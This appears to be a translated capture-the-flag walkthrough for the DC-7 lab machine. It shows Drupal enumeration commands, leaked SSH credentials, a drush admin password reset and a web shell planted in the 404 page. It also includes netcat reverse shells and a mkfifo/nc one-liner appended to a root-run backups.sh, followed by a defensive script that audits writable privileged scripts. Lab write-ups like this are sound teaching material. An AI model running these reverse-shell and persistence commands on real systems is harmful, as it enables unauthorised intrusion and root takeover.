DC-7 target machine
For personal entertainment only
Target information
Download: http://www.five86.com/downloads/DC-7.zip
1. Host scanning
![](https://upload-images.jianshu.io/upload_images/4664072-b7f235f75e8eeef9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2. Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-9af3ea128db8eaca.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-c54a81c93dd559c1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Or
python3 cmseek.py --url http://192.168.17.134
![](https://upload-images.jianshu.io/upload_images/4664072-fb9f70a2ebaa3572.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Search for Drupal-related information; found a script on GitHub
pip3 install -r requirements.txt
python3 drupwn --help
![](https://upload-images.jianshu.io/upload_images/4664072-e302841ce3bfb659.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
python3 drupwn --users --nodes --modules --dfiles --themes --thread 5 enum http://192.168.17.134
![](https://upload-images.jianshu.io/upload_images/4664072-40c5d250168fbb27.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Install the script
git clone https://github.com/droope/droopescan.git
cd droopescan
pip3 install -r requirements.txt
droopescan scan --help
![](https://upload-images.jianshu.io/upload_images/4664072-c8d263b69701d64c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
droopescan scan drupal -u http://192.168.17.134 -t 32
![](https://upload-images.jianshu.io/upload_images/4664072-f6fdd322caf21cee.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d4f91552ef8f75b1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
3. Vulnerability discovery and exploitation
![](https://upload-images.jianshu.io/upload_images/4664072-66542a897836ba41.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-daafcdccdc0e17da.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-925f86ba3f809939.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
SSH login
$username="dc7user"; $password="MdR3xOgB7#dW";
![](https://upload-images.jianshu.io/upload_images/4664072-e5038578675b7346.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-a09ed220fe5ec334.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Decrypt the mail
![](https://upload-images.jianshu.io/upload_images/4664072-7205db0278cfe67f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-7849d3f6cd6a2ee9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-380f31b9cf7e72a6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-8b80403eaa2bef1b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-863e59cef7955048.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Enter the database
![](https://upload-images.jianshu.io/upload_images/4664072-1c3b61ee3b680b50.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-5c79de0d389cd4b5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Cracking the hash failed, so change the admin password
drush user-password admin --password="test"
![](https://upload-images.jianshu.io/upload_images/4664072-7e6ecf3c06870812.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Log in to the admin backend and gather information
![](https://upload-images.jianshu.io/upload_images/4664072-91f9c795a9d119d1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-bf325a36bdf7e346.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-b02010c92f5cc5cf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
wget https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
![](https://upload-images.jianshu.io/upload_images/4664072-5267e603b26d5c07.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e16f3b7f6050f23f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-2da9bd43a4e70de2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Edit the 404 page
![](https://upload-images.jianshu.io/upload_images/4664072-16dae46073b2714f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-4c3efb05a9386ff1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Insert the web shell
![](https://upload-images.jianshu.io/upload_images/4664072-eb5ce107a6814a3c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ec47e7667248b25e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
nc -e /bin/bash 192.168.17.134 4444
nc -lvvp 4444
python -c 'import pty;pty.spawn("/bin/bash")'
![](https://upload-images.jianshu.io/upload_images/4664072-e109f8e4e38a32e6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
cd /opt/scripts
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.17.129 1234 >/tmp/f" >> backups.sh
![](https://upload-images.jianshu.io/upload_images/4664072-9f44d7d6542407c6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e1f391f66ffc0229.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
After obtaining root privileges, go to root's home directory and find the theflag.txt file
![](https://upload-images.jianshu.io/upload_images/4664072-468a99b486ad3953.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
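The root step above works because backups.sh in /opt/scripts could be appended to from the web shell and is then executed with root privileges. As an added example (not part of the original write-up), the shell functions below audit a privileged script and its directory for that condition; they assume GNU stat, and the function names and the constructed sample file are illustrative.

```shell
#!/bin/sh
# Added example: flag a script that a privileged job executes but that an
# account other than the expected owner could modify. Assumes GNU stat.

# check_one PATH WANT_UID
# Prints one FINDING line per problem; returns 0 if clean, non-zero otherwise.
check_one() {
    info=$(stat -c '%u %a' -- "$1") || return 2
    uid=${info% *}      # numeric owner
    mode=${info#* }     # octal permission bits, e.g. 775
    bad=0
    if [ "$uid" != "$2" ]; then
        echo "FINDING $1: owned by uid $uid, expected $2"
        bad=1
    fi
    # 022 = write bit for group and for other
    if [ $((0$mode & 022)) -ne 0 ]; then
        echo "FINDING $1: writable by group or other (mode $mode)"
        bad=1
    fi
    return $bad
}

# audit_script PATH [WANT_UID]
# Checks the script and its containing directory: a writable directory
# lets a user replace the file even when the file itself is locked down.
audit_script() {
    want=${2:-0}        # default: script must belong to root
    rc=0
    check_one "$1" "$want" || rc=1
    check_one "$(dirname -- "$1")" "$want" || rc=1
    return $rc
}

# Constructed sample: a stand-in for /opt/scripts/backups.sh with a
# group-writable mode, audited against the current uid so the demo runs
# unprivileged. On a real host: audit_script /opt/scripts/backups.sh
demo_dir=$(mktemp -d)
printf '#!/bin/sh\n' > "$demo_dir/backups.sh"
chmod 775 "$demo_dir/backups.sh"
audit_script "$demo_dir/backups.sh" "$(id -u)" || echo "audit failed"
rm -rf "$demo_dir"
```

Running the same check over every script referenced from root's crontab and the system cron directories shows which scheduled jobs a service account could tamper with.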